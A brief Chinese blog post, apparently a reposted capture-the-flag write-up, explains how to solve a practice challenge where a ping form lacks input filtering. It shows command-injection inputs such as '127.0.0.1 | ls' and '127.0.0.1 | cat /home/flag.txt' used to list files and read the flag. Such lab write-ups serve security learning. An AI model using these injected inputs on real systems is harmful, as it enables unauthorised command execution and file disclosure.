command_execution

2021/8/20 23:38:12

本文主要是介绍command_execution,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

题目来源: Cyberpeace-n3k0

题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

 

 

首先测试一下127.0.0.1,发现返回了ping的结果

然后127.0.0.1 | ls,返回index.php,命令被成功zhixing

127.0.0.1 | find / -name flag.txt,找到flag.txt,位于/home下

127.0.0.1 | cat /home/flag.txt,得到flag



这篇关于command_execution的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程